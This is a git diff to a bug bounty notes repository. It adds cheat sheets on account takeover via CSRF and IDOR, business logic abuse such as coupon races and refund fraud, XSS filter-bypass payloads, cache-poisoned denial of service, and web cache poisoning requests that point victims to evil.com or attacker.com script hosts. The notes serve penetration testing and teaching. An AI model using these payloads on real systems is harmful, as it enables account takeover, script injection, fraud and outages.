diff --git a/Account Takeover.md b/Account Takeover.md index 49447ea..674da98 100644 --- a/Account Takeover.md +++ b/Account Takeover.md @@ -17,4 +17,33 @@ After sign up using victim email, try signup again but using different password POST /newaccount [...] email=victim@mail.com&password=hacked -``` \ No newline at end of file +``` +Source: [Link](https://medium.com/bugbountywriteup/account-takeover-via-csrf-78add8c99526) + +3. via CSRF + - Create an account as an attacker and fill all the form, check your info in the Account Detail. + - Change the email and capture the request, then created a CSRF Exploit. + - The CSRF Exploit looks like as given below. I have replaced the email value to anyemail@*******.com and submitted a request in the victim’s account. + +```html + + +
+ + +
+ + +``` +Source: [Link](https://medium.com/bugbountywriteup/account-takeover-via-csrf-78add8c99526) + +4. Chaining with IDOR, for example +``` +POST /changepassword.php +Host: site.com +[...] +userid=500&password=heked123 +``` +500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID + +5. No Rate Limit on 2FA \ No newline at end of file diff --git a/Business Logic Errors.md b/Business Logic Errors.md new file mode 100644 index 0000000..f7b7c6c --- /dev/null +++ b/Business Logic Errors.md @@ -0,0 +1,65 @@ +# Business Logic Errors +1. Review Functionality +- Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product. +- Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve. +- Try to see if the same user can post multiple ratings for a product. This is an interesting endpoint to check for Race Conditions. +- Try to see if the file upload field is allowing any exts, it's often observed that the devs miss out on implementing protections on such endpoints. +- Try to post reviews like some other users. +- Try performing CSRF on this functionality, often is not protected by tokens + +2. Coupon Code Functionality +- Apply the same code more than once to see if the coupon code is reusable. +- If the coupon code is uniquely usable, try testing for Race Condition on this function by using the same code for two accounts at a parallel time. +- Try Mass Assignment or HTTP Parameter Pollution to see if you can add multiple coupon codes while the application only accepts one code from the Client Side. +- Try performing attacks that are caused by missing input sanitization such as XSS, SQLi, etc. on this field +- Try adding discount codes on the products which are not covered under discounted items by tampering with the request on the server-side. + +3. Delivery Charges Abuse +- Try tampering with the delivery charge rates to -ve values to see if the final amount can be reduced. +- Try checking for the free delivery by tampering with the params. + +4. Currency Arbitrage +- Pay in 1 currency say USD and try to get a refund in EUR. Due to the diff in conversion rates, it might be possible to gain more amount. + +5. Premium Feature Abuse +- Try forcefully browsing the areas or some particular endpoints which come under premium accounts. +- Pay for a premium feature and cancel your subscription. If you get a refund but the feature is still usable, it's a monetary impact issue. +- Some applications use true-false request/response values to validate if a user is having access to premium features or not. +- Try using Burp's Match & Replace to see if you can replace these values whenever you browse the app & access the premium features. +- Always check cookies or local storage to see if any variable is checking if the user should have access to premium features or not. + +6. Refund Feature Abuse +- Purchase a product (usually some subscription) and ask for a refund to see if the feature is still accessible. +- Try for currency arbitrage explained yesterday. +- Try making multiple requests for subscription cancellation (race conditions) to see if you can get multiple refunds. + +7. Cart/Wishlist Abuse +- Add a product in negative quantity with other products in positive quantity to balance the amount. +- Add a product in more than the available quantity. +- Try to see when you add a product to your wishlist and move it to a cart if it is possible to move it to some other user's cart or delete it from there. + +8. Thread Comment Functionality +- Unlimited Comments on a thread +- Suppose a user can comment only once, try race conditions here to see if multiple comments are possible. +- Suppose there is an option: comment by the verified user (or some privileged user) try to tamper with various parameters in order to see if you can do this activity. +- Try posting comments impersonating some other users. + +9. Parameter Tampering +- Tamper Payment or Critical Fields to manipulate their values +- Add multiple fields or unexpected fields by abusing HTTP Parameter Pollution & Mass Assignment +- Response Manipulation to bypass certain restrictions such as 2FA Bypass + +10. App Implementation Logic Abuse +- If an app accepts JSON data, try changing content type to XML and see if the XML data is being processed, it can be left vulnerable to XXE or XML-based attacks. +- If an application is using the DELETE method to delete a resource but there is no CSRF protection, try converting the method to GET/POST and add an additional parameter like ?method=delete +- In the above case if any user ID is going in the request, try bypassing method-based restrictions by adding parameters like X-Method-Override. +- If you see a UUID, try to replace with similar mapping such as 1,2,3.. often UUID mapping is accepted by the applications. +- Try the HEAD method to bypass the authentication restrictions. + +11. Denial of Service Situations +- Resource Exhaustion +- Weak Account Lockout Mechanisms +- Kicking out a user/banning a user somehow from accessing the application. +- Application Level DoS by abusing the various functionalities present within the application. + +Source: [@harshbothra_](https://twitter.com/harshbothra_) \ No newline at end of file diff --git a/Bypass/Bypass 403.md b/Bypass/Bypass 403.md index 4b623f7..fe7e9ce 100644 --- a/Bypass/Bypass 403.md +++ b/Bypass/Bypass 403.md @@ -51,4 +51,11 @@ Try this to bypass http://target.com/aDmIN ``` +6. Via Web Cache Poisoning +``` +GET /anything HTTP/1.1 +Host: victim.com +X­-Original-­URL: /admin +``` + Source: [@iam_j0ker](https://twitter.com/iam_j0ker) diff --git a/Cross Site Scripting.md b/Cross Site Scripting.md index c9202b4..14a54d5 100644 --- a/Cross Site Scripting.md +++ b/Cross Site Scripting.md @@ -37,7 +37,7 @@ --> ``` -4. Add when the input inside or between opening/closing tags, tag can be , and any other HTML tags +4. Add when the input inside or between opening/closing tags, tag can be ```,,<script>``` and any other HTML tags ```html </tag><script>alert(1)</script> @@ -70,7 +70,7 @@ <input id="keyword" type="text" name="q" value="" onmouseover=alert(1)"> ``` -6. Use </script> when input inside <script> tags +6. Use </script> when input inside ```<script>``` tags ```html </script><script>alert(1)</script> ``` @@ -271,4 +271,53 @@ $ exiftool -Artist='"><script>alert(1)</script>' dapos.jpeg <a:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</a:script> ``` > Add a "-->" to payload if input lands in a comment section + > Add a "]]>" if input lands in a CDATA section + +# XSS Cheat Sheet (Bypass) +19. Mixed Case +```html +<Script>alert(document.cookie)</Script> +``` + +20. Unclosed Tags +```html +<svg onload="alert(1)" +``` + +21. Uppercase Payloads +```html +<SVG ONLOAD=ALERT(1)> +``` + +22. Encoded XSS +```html +(Encoded) +%3Csvg%20onload%3Dalert(1)%3E + +(Double Encoded) +%253Csvg%2520onload%253Dalert%281%29%253E + +(Triple Encoded) +%25253Csvg%252520onload%25253Dalert%25281%2529%25253E +``` + +23. JS Lowercased Input +```html +<SCRİPT>alert(1)</SCRİPT> +``` + +24. PHP Email Validation Bypass +```html +<svg/onload=alert(1)>"@gmail.com +``` + +25. PHP URL Validation Bypass +```html +javascript://%250Aalert(1) +``` + +26. Inside Comments Bypass +```html +<!--><svg onload=alert(1)--> +``` \ No newline at end of file diff --git a/Denial Of Service.md b/Denial Of Service.md index 0467b98..1353778 100644 --- a/Denial Of Service.md +++ b/Denial Of Service.md @@ -32,16 +32,15 @@ Reference: [Hackerone #409370](https://hackerone.com/reports/409370) Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/128/5f5a974e5f67ab7a11d2d92bd40f8997969f2f17/lottapixel.jpg?response-content-disposition=attachment%3B%20filename%3D%22lottapixel.jpg%22%3B%20filename%2A%3DUTF-8%27%27lottapixel.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQYFO7EZHL%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110133Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFIaCXVzLXdlc3QtMiJGMEQCIGgY3dUtffr4V%2BoxTJaFxc%2F7qjRodT3XLyN1ZLEF8%2FhfAiAXklx1Zvy3iKIGm1bocpDUP1cTx46eTbsDOKqRC93fgyq0AwhbEAEaDDAxMzYxOTI3NDg0OSIMH9s8JiCh%2B%2FNADeibKpEDocuqfbmxkM5H5iKsA3K4RuwcxVT9ORLJrjJO%2FILAm%2BcNsQXTgId%2Bpw1KOLkbFKrq0BQIC6459JtfWqHPXvDC7ZJGboQ%2FXE0F%2BAZQa6jaEyldrkKuDewNy5jy3VX1gquS%2BWrGl%2BGhwmXB4cg1jgOugGUsC%2FxD%2BcragIJAtGA7lp3YdcL%2FiQbnvuzmLP8w%2FyCHPUrpOw94bPOk8fpetOJoLmDfXZdL3hLGBEUGS7dSOoyebLSXGZDctkSpnXCq383lWYWYn0LSv1ooVvuCVzgxE%2BZi4b4QvLjjMG3FJdEX%2BDYmnDvnSrRoDtyj8bD3cP3xbZ3jaNYRbIlQTm2zR1DgoaDGE74FmpZWHcyC8zK0V6AKG6OzkcIaGRnGdDNSpZkN0DrWE7uY6BLiIGY16rflYOaElnbxijoMNDsU3MZH8gGk7crYJ%2FCeHeayInPBDgiREBgn7orAIjOY3xg8vzwKO96a90LmkK7wk977TbKfLIng1iNP9EMKYDjGePdBYDML9zBeqhO5LrVH%2BfbwzG5GXi0w5fnn%2BgU67AFRBwMChVRr%2FLW4j0PqpXUeN5ysVIuagoqSwqOhfwI9rtk56zTuGhO3du4raY5SOQ9vSkRdYHhga%2BW7oQTByD1ISiSaOjHs1s%2FrNfvIfMA8r0drPSykOdCuV2A5NhBpEPpT%2BuOosogdPihcORhO3hbcQJ9y4uxBsaBSJr%2F8S2CGjwZw7SOGmNaNFsPu%2BMRbYDA%2FH2eUMBl96w6KpUuNAXEPUcfq3weRMP1vXW62S4OyniYJ6DEVRkkE4eFZMUqy4c94uwSAegK54Po0V0sPM%2FncTESCgBf7Qe2zZlPhdRGZR%2F25cF6JTH0t2VIRQw%3D%3D&X-Amz-Signature=a837cb6b26bf437fa5008695310a21788918081c36e745d286c5cba9fd4a78e0) -References: [Hackerone #390] (https://hackerone.com/reports/390) +References: [Hackerone #390](https://hackerone.com/reports/390) 5. Frame flood, using GIF with a huge frame Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/136/902000ac102f14a36a4d83ed9b5c293017b77fc7/uber.gif?response-content-disposition=attachment%3B%20filename%3D%22uber.gif%22%3B%20filename%2A%3DUTF-8%27%27uber.gif&response-content-type=image%2Fgif&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ245MJJPA%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110848Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFMaCXVzLXdlc3QtMiJHMEUCIEC768ifpRHeEUucuNuVL%2FdcSsWMnGeNp%2FMhKs6afB01AiEAiZOP%2FwMaeQMITUni3aFcACIOqOHnWHgLKuXHRrb5LooqtAMIXBABGgwwMTM2MTkyNzQ4NDkiDHHy9PJ2ccl9cmsvyCqRA6bliBHBMPXR6NYflM%2BCXCCQ5VLdPCATpmLs9DhVuYsjxR3JUtVHnBvtfEYYWDWWsLoC3xuzmug5ycrAvqK%2BTYDYO7l4HD1rXfyEBkR579ZlUFab6bOL4i8nDqblun%2FeV253Sgd6GzL4E%2FXmUN%2FC6qNydSd9hp2fLoyNjqob6o5zJjmnqvZsq50ROOZwf1idkDtr163qeVZERnan7aY9rM%2FsX4iVdE4wY0rLw1maGRuDF2aLVCxPB681htsHt%2FpoZ18QY7LjcbNjbjB4PgXLd1sm5zQ4q9mPVxTZPvzo9BJCh7l6kMLHCtJXOXfrvvN8UBgIqr1KXvodzv7FRQYcvEpfw4pwCTWzBs8VeEcwS9gjOXFMNLNI8SZ9V76VQ5KrOIpKhzM9UQQN3DVzY3SwMHydX%2B%2BYcQTt%2FjvqTkorsltqob2g5E1K0U8btRLBvBqOo0Vbr75zLcLUUomDBQzSNSvJgTN43huYmkZxBpWAAId72Tt6m56aFQLXkCKGSoMxYjrrVW9jc37pVl3lZU7FIX0AMIuN6PoFOusBpDCrjFwR1Y7t7W8wLapYjI6yOkkvWTFwWvx38jZl9okqo5xchKolmKxKX7cfGPIyuUmSXc1xa0nKwYeOYlhQZfyI0NobqyWW81ITuuUjsBxULuqrXqfVl0PTjTTpqe%2FHvU6wYSE358XfggtcqaH9PPgNDOejgv%2FLnh9AH9nyqIWuaCu865IfAOupVVzFzQilyB2LDyQtTS4Kp5dHyEAibRQlqeKHWOkUE2mQefAaTxKLRKrs0mJQYSuC%2B4LQEB3Cq9Nhj5HN%2BYT7A7CDLrvyChyfYXQZYr0lR1jN91Yd7SBe2jB1Qls%2Bx%2FEUlQ%3D%3D&X-Amz-Signature=910a3812cf3b69f6fa72f39a89a6df2f395f8d17ef8702eeb164a0477c64fff5) -References: [Hackerone #400] (https://hackerone.com/reports/400) +References: [Hackerone #400](https://hackerone.com/reports/400) -**Rare cases** -1. Sometimes in website we found a parameter that can adjust the size of the image, for example +6. Sometimes in website we found a parameter that can adjust the size of the image, for example ``` https://target.com/img/vulnerable.jpg?width=500&height=500 ``` @@ -52,13 +51,87 @@ https://target.com/img/vulnerable.jpg?width=99999999999&height=99999999999 References: [Hackerone #751904](https://hackerone.com/reports/751904) -2. Try changing the value of the header with something new, for example: +7. Try changing the value of the header with something new, for example: ``` Accept-Encoding: gzip, gzip, deflate, br, br ``` References: [Hackerone #861170](https://hackerone.com/reports/861170) -3. Sometimes if you try bug "No rate limit", after a long try it. The server will go down because there is so much requests +8. Sometimes if you try bug "No rate limit", after a long try it. The server will go down because there is so much requests References: [Hackerone #892615](https://hackerone.com/reports/892615) + +9. ReDoS (Regex DoS) occurs due to poorly implemented RegEx + +References: [Hackerone #511381](https://hackerone.com/reports/511381) + +10. CPDoS ([Cache Poisoned Denial of Service](https://cpdos.org/)) +- HTTP Header Oversize (HHO) + + A malicious client sends an HTTP GET request including a header larger than the size supported by the origin server but smaller than the size supported by the cache + ``` + GET /index.html HTTP/1.1 + Host: victim.com + X-Oversized-Header-1: Big_Value + ``` + The response is + ``` + HTTP/1.1 400 Bad Request + ... + Header size exceeded + ``` +- HTTP Meta Character (HMC) + + this attack tries to bypass a cache with a request header containing a harmful meta character. Meta characters can be, e.g., control characters such as line break/carriage return (\n), line feed (\r) or bell (\a). + + ``` + GET /index.html HTTP /1.1 + Host: victim.com + X-Meta-Malicious-Header: \r\n + ``` + The response is + ``` + HTTP/1.1 400 Bad Request + ... + Character not allowed + ``` +- HTTP Method Override (HMO) + + There are several headers present in HTTP Standard that allow modifying overriding the original HTTP header. Some of these headers are: + ``` + 1. X-HTTP-Method-Override + 2. X-HTTP-Method + 3. X-Method-Override + ``` + The header instructs the application to override the HTTP method in request. + ``` + GET /index.php HTTP/1.1 + Host: victim.com + X-HTTP-Method-Override: POST + ``` + The response is + ``` + HTTP/1.1 404 Not Found + ... + POST on /index.php not foudn + ``` + +- X-Forwarded-Port + ``` + GET /index.php?dontpoisoneveryone=1 HTTP/1.1 + Host: www.hackerone.com + X-Forwarded-Port: 123 + ``` +- X-Forwarded-Host + ``` + GET /index.php?dontpoisoneveryone=1 HTTP/1.1 + Host: www.hackerone.com + X-Forwarded-Host: www.hackerone.com:123 + ``` + +![Response DoS](https://portswigger.net/cms/images/6f/83/45a1a9f841b9-article-screen_shot_2018-09-13_at_11.08.12.png) + +References: +- [Hackerone #409370](https://hackerone.com/reports/409370) +- [CPDoS](https://cpdos.org/) \ No newline at end of file diff --git a/Insecure Direct Object References.md b/Insecure Direct Object References.md index 436294d..779a07e 100644 --- a/Insecure Direct Object References.md +++ b/Insecure Direct Object References.md @@ -1,7 +1,4 @@ ## IDOR (Insecure Direct Object Reference) - -Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. The term IDOR was popularized by its appearance in the OWASP 2007 Top Ten. However, it is just one example of many access control implementation mistakes that can lead to access controls being circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation. - 1. Add parameters onto the endpoints for example, if there was ```html GET /api/v1/getuser diff --git a/README.md b/README.md index 83cb9b1..d2a2b6c 100644 --- a/README.md +++ b/README.md @@ -1,13 +1,16 @@ # All about bug bounty +These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too! ## List - [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Account%20Takeover.md) +- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md) - [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md) - [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md) - [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md) - [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md) - [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md) - [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Password%20Reset%20Flaws.md) +- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md) ## List Bypass - [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md) diff --git a/Web Cache Poisoning.md b/Web Cache Poisoning.md new file mode 100644 index 0000000..f8084a1 --- /dev/null +++ b/Web Cache Poisoning.md @@ -0,0 +1,147 @@ +# Web Cache Poisoning +1. Basic poisoning +``` +GET / HTTP/1.1 +Host: www.vuln.com +X-Forwarded-Host: evil.com +``` +The response is +``` +HTTP/1.1 200 OK +Cache-Control: public, no-cache +… +<img href="https://evil.com/a.png" /> +``` +> Or you can input XSS payloads +``` +GET / HTTP/1.1 +Host: www.vuln.com +X-Forwarded-Host: a.\"><script>alert(1)</script> +``` +The response is +``` +HTTP/1.1 200 OK +Cache-Control: public, no-cache +… +<img href="https://a.\"><script>alert(1)</script>a.png" /> +``` +2. Seizing the Cache +``` +GET / HTTP/1.1 +Host: unity3d.com +X-Host: evil.com +``` +The response is +``` +HTTP/1.1 200 OK +Via: 1.1 varnish-v4 +Age: 174 +Cache-Control: public, max-age=1800 +… +<script src="https://evil.com/x.js"> +</script> +``` +3. Selective poisoning +``` +GET / HTTP/1.1 +Host: redacted.com +User-Agent: Mozilla/5.0 (<snip> Firefox/60.0) +X-Forwarded-Host: a"><iframe onload=alert(1)> +``` +The response is +``` +HTTP/1.1 200 OK +X-Served-By: cache-lhr6335-LHR +Vary: User-Agent, Accept-Encoding +… +<link rel="canonical" href="https://a">a<iframe onload=alert(1)> +``` +4. Chaining Unkeyed Inputs +- First step +``` +GET /en HTTP/1.1 +Host: redacted.net +X-Forwarded-Host: xyz +``` +The response is +``` +HTTP/1.1 200 OK +Set-Cookie: locale=en; domain=xyz +``` +- Second step +``` +GET /en HTTP/1.1 +Host: redacted.net +X-Forwarded-Scheme: nothttps +``` +The response is +``` +HTTP/1.1 301 Moved Permanently +Location: https://redacted.net +``` +- Third step +``` +GET /en HTTP/1.1 +Host: redacted.net +X-Forwarded-Host: attacker.com +X-Forwarded-Scheme: nothttps +``` +The response is +``` +HTTP/1.1 301 Moved Permanently +Location: https://attacker.com/en +``` + +5. Route Poisoning +``` +GET / HTTP/1.1 +Host: www.goodhire.com +X-Forwarded-Server: evil +``` +The response is +``` +HTTP/1.1 404 Not Found +CF-Cache-Status: MISS +... +<title>HubSpot - Page not found +

The domain canary does not exist in our system.

+``` +To exploit this, we +need to go to hubspot.com, register ourselves as a HubSpot client, place a payload on our HubSpot page, and +then finally trick HubSpot into serving this response on goodhire.com +``` +GET / HTTP/1.1 +Host: www.goodhire.com +X-Forwarded-Host: portswigger-labs-4223616.hs-sites.com +``` +The response is +``` +HTTP/1.1 200 OK +… + +``` + +6. Hidden Route Poisoning +``` +GET / HTTP/1.1 +Host: blog.cloudflare.com +X-Forwarded-Host: evil +``` +The response is +``` +HTTP/1.1 302 Found +Location: https://ghost.org/fail/ +``` +When a user first registers a blog with Ghost, it issues them with a unique subdomain under ghost.io. Once a +blog is up and running, the user can define an arbitrary custom domain like blog.cloudflare.com. If a user has +defined a custom domain, their ghost.io subdomain will simply redirect to it: +``` +GET / HTTP/1.1 +Host: blog.cloudflare.com +X-Forwarded-Host: noshandnibble.ghost.io +``` +The response is +``` +HTTP/1.1 302 Found +Location: http://noshandnibble.blog/ +``` \ No newline at end of file